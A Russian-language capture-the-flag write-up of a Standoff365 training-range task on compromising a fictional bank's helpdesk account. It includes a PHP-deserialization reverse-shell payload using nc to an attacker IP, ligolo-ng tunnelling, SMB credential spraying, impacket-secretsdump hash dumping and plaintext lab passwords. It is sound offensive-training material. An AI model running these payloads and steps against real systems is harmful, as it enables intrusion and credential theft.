WriteUp. Компрометация учетной записи специалиста службы поддержки Commercial Bank of Standoff
Прохождение задания ‘Прохождение задачи ‘Standoff365 - Industry - Банковская система - Компрометация учетной записи специалиста службы поддержки Commercial Bank of Standoff’.
Информация о задании
| Название | Компрометация учетной записи специалиста службы поддержки Commercial Bank of Standoff |
|---|---|
| Уровень | Низкий |
| Категория | Pentest Machines |
| ОС | Linux, Windows |
Начало
В задании сказано:
Получите доступ к перемещаемому профилю сотрудника службы поддержки(helpdesk) Commercial Bank of Standoff (Taured branch). Подключитесь по RDP к его рабочему месту.
Подключаемся по VPN
sudo openvpn *.ovpn  |
|---|
Разведка
От сюда берем информацию о сетях. Так в задании сказано про Commercial Bank of Standoff (cbs), то нам необходимы сети: Внешний периметр: 10.124.0.128/26 и Внутренний периметр: 10.154.4.0/23.
nmap 10.124.0.128/26 -T5 -v --open -A -PnОбратите внимание на параметр -Pn
 |
|---|
Нас интересует IP 10.124.0.134
 |
|---|
Проверяем сайт:
 |
|---|
Воспользуемся инструментом dnsrecon
dnsrecon -r 10.124.0.128/26 -n 10.124.0.162IP 10.124.0.162 это там где 53 порт
 |
|---|
Через Burp производим разведку дальше, а именно тыкаем везде и всюду, да поиска “чего-то интересного”. При вводе на форме “Обратной связи” находим что-то интересное. Пишет, что не найдено api.
 |
|---|
 |
|---|
Убираем лишнее api
 |
|---|
Эксплуатация
Предпологаем что тут есть уязвимость вида: “десериализации PHP”
Пытаемся эксплуатировать уязвимость и выполнить обратный шелл и при этом найти правильный параметр s:
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.127.245.254 4444 >/tmp/f') |
|---|
Выполняем, видим что мы поймали шел
 |
|---|
Дальнейшая разведка
Проверяем директорию /home на наличие файлов и видим файл history.txt. Проверяем данный файл и получаем креды.
 |
|---|
Подключение по SSH на 10.124.0.163 и чтение файлов других пользователей
Подключаемся по SSH на 10.124.0.163, который мы нашли ранее при сканировании сети nmap. Пользователь: jack Пароль:rN9YvGXqd2b3RYrD21r7
ssh jack@10.124.0.163 |
|---|
Вводим команду на проверку привилегий. Видим что есть “высокие” права на cat
sudo -l |
|---|
Проверяем все файлы истории всех пользователей. Находим в истории root некий файл .wincreds пользователя astridion
 |
|---|
Проверяем данный файл. Находим креды
 |
|---|
Создание туннеля во внутреннюю сеть
Для создания туннеля во внутреннюю сеть будем использовать ligolo-ng качаем тут. Нам нужны agent и proxy. Качаем себе на машину
 |
|---|
Поднимаем http сервер у себя на машине на 8000 порту
python3 -m http.server 8000 |
|---|
Переходим в папку /tmp и качаем agent
curl -O http://10.127.245.254:8000/agent |
|---|
Готовим ligolo у себя на тачке
sudo ip tuntap add user kali mod tun ligolo
sudo ip link set ligolo up |
|---|
Запускаем прокси на порту 1155
./proxy -selfcert -laddr 0.0.0.0:1155 |
|---|
Переходим на jmp и делаем исполняемый агент и запускаем
chmod +x agent
./agent -connect 10.127.245.254:1155 -ignore-cert |
|---|
Далее снова переходим на свою тачку и видим что появилась сессия, входим в нее и запускаем
session
start |
|---|
Ну а теперь необходимо “завернуть” внутреннюю сеть банка cbs 10.154.4.0/23 в интерфейс ligolo
sudo ip route add 10.154.4.0/23 dev ligolo  |
|---|
Сбор информации о внутренней сети банка cbs 10.154.4.0/23
Воспользуемся утилитой nxc (протокол smb) и кредами, которые нашли ранее, а именно: Пользователь: astridio Пароль: ZYSE6G01pICXQByw7JO
nxc smb 10.154.4.0/23 -u astridion -p zZYSE6G01pICXQByw7JO |
|---|
Проверяем на наличие сервисов с помощью утилиты nmap на всех портах (-p-)
nmap 10.154.4.166 -T5 -v --open -A -p- |
|---|
Выполнение НС
Пробуем получить дамп с машины 10.154.4.166, с помощью утилиты impacket-secretsdump и видим пароль пользователя helpdesk
impacket-secretsdump 'cbs.stf/astridion':'zZYSE6G01pICXQByw7JO'@10.154.4.166  |
|---|
Получаем доступ по RDP. НС выполнена
xfreerdp3 /v:10.154.4.166:33389 /u:helpdesk /p:9i8pwK95TQ5bWtl7fadJ /d:cbs.stf  |
|---|